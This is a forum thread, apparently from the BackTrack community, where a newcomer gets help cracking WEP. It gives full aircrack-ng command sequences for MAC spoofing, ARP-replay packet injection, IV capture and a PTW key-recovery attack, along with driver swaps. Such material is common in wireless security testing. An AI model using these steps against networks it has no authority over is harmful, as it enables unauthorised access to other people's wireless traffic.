The interface MAC (00:1A:70:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:60:B3B:89:73
change your mac to the client one before.........
Hello,
I have backtrack live cd bt2 with wusb54gc (rt73 chip)
but injection with airplay-ng don't increase on sent packet
look below
bt aircrack-ng-0.9.1 # aireplay-ng -3 -e essid _target -b 00:14:A4:xx:xx:xx -h 00:60:xx:xx:xx:xx -x 100 rausb0
The interface MAC (00:1A:70:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:60:B3B:89:73
Saving ARP requests in replay_arp-0824-194637.cap
You should also start airodump-ng to capture replies.
Read 1408 packets (got 0 ARP requests), sent 0 packets...
how cani increase iv packet on another shell with airodump
thank by![]()
The interface MAC (00:1A:70:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:60:B3B:89:73
change your mac to the client one before.........
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
thank you for you answer but
after
ifconfig rausb0 down
macchanger --mac 00:60:B3:xx:xx:73 rausb0
ifconfig rausb0 up
airodump-ng --write file --ivs --channel 1 rausb0
but the injection everytime still on 367 packets
aireplay-ng -3 -b 00:14:A4:yy:yy:FE -h 00:60:B3:xx:xx:73 rausb0
Saving ARP requests in replay_arp-0825-222126.cap
You should also start airodump-ng to capture replies.
Read 28017 packets (got 2 ARP requests), sent 367 packets...
and it 's very difficult for gather many iv.
where is my problem with my wusb54gc
wich driver did you use ?
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
i use default driver in backtrack bt2.0 live cd
whish driver advise me?
i use this command for change driver?
copy the file to root
tar ......bz2
cd rt73-x.x.x/Module
make
make install
where exacly i must be install the new driver?
Thank i m newbie in linux world
Excuse for my bad inglish
i advise aspj enhanced rt73 driver 1.1.0 (wich one i use)
http://homepages.tu-darmstadt.de/~p_...-1.1.0.tar.bz2
for uninstall a driver :
ifconfig rausb0 down
rmmod rt73
cd to the module folder where you extracted the driver
make && make install
modprobe rt73
ifconfig rausb0 up
no pb with your english, you're not alone to be a non native english spoken.......im french.....
hope helps
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
ok ReBonjour,
Thank for you help
i removed driver backtrack
i try install driver rt73 2.0.0
but purhaps i try with 1.0.0
my IV increase increase
i have 1.500.000 iv i try crack wep key with
aircrack-ng *.ivs *.cap
i work on that i think i must be more iv because
my wep key is 128 bits
Bye thank's
lol no with aircrack ptw attack (default in dev version), you need 20-50000 IVS for a 128 wep key..... actually collect 1500000 IVS is a waste of time until you want to test the old korek cracking style method....but nowdays everybody use ptw...
if you use aircrack-ng 0.9 or 0.9.1
aircrack-ng -z -b APMAC nameof.cap (-z is PTW)
be sure to NOT USE --ivs switch with ptw until you use dev 1.0 version
with 1.0 ptw is now default
aircrack-ng -b APMAC nameof.cap
will launch a ptw attack....
you can use --ivs with 1.0 and ptw
BTW combining all tekniks i know, i can crack my own wep 128, in 74 secs.....from the begining........
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Currently i use this version aircrack on live cd
Aircrack-ng 0.7 r214 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
i think i can't begin -ptw attack with this version.
How can i remove this aircrack version
for install aircrack 0.9
In this command aircrack-ng -z -b APMAC nameof.cap (-z is PTW)
APMAC is station mac adress????
thank you for time and you help
bye.
nop APMAC is the mac of the accesspoint not the station
take this precompiled module (it's 0.9.0) on my ftp
ftp://ftp.berlios.de/pub/svair/aircr...0.9-i386-1.lzm
if your using live cd or live usb
just copy it in bt/modules directory onto the iso or the usb
if you get a real install :
open command line change to the dir you dl it
type this :
"lzm2dir aircrack-ng-0.9-i386-1.lzm /" (without quotes)
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006